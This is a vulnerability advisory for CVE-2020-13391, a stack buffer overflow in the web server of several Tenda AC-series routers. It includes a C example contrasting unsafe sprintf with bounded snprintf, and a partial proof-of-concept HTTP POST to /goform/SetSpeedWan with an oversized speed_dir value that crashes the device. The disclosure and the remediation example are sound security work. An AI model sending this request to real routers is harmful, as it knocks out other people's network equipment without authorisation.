CVE-2020-13391: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13391    CVE_details

Affected products:  

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router's web server (httpd). While processing the speed_dir parameter of a POST request, the value is passed directly to sprintf, which writes it into a local variable on the stack; an oversized value overwrites the return address of the function. An attacker can construct a payload to execute arbitrary code.
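
The unbounded sprintf pattern described above next to a bounded replacement, as an added example that is not Tenda's httpd code. The function names, the 64-byte buffer and the "speed_dir=%s" format string are assumptions; the page does not show the real ones.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 64  /* assumed size; the page does not give the real one */

/* Pattern from the overview: the request value is formatted straight into a
 * fixed stack buffer. Anything longer than the buffer runs past it and
 * reaches the saved return address. Shown for contrast only. */
int set_speed_unsafe(const char *speed_dir)
{
    char buf[BUF_LEN];
    sprintf(buf, "speed_dir=%s", speed_dir);  /* no bound on speed_dir */
    return (int)strlen(buf);
}

/* Bounded form: snprintf never writes more than out_len bytes, and a
 * return value >= out_len means the input did not fit, so reject it
 * instead of continuing with a truncated string. */
int set_speed_safe(const char *speed_dir, char *out, size_t out_len)
{
    int n;
    if (speed_dir == NULL || out == NULL || out_len == 0)
        return -1;
    n = snprintf(out, out_len, "speed_dir=%s", speed_dir);
    if (n < 0 || (size_t)n >= out_len) {
        out[0] = '\0';
        return -1;
    }
    return n;
}

int main(void)
{
    char out[BUF_LEN];
    char big[901];                 /* constructed oversized value */
    memset(big, '1', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    printf("short: %d\n", set_speed_safe("1", out, sizeof out));
    printf("oversized: %d\n", set_speed_safe(big, out, sizeof out));
    return 0;
}
```

Rejecting the request when the value does not fit matters as much as the bounded write: silently truncating would leave the handler working on a value the client never sent.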

POC

This PoC can result in a DoS.

For the sake of the vendor's security, we provide only part of the HTTP request.

POST /goform/SetSpeedWan HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: password=jgi5gk

speed_dir=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS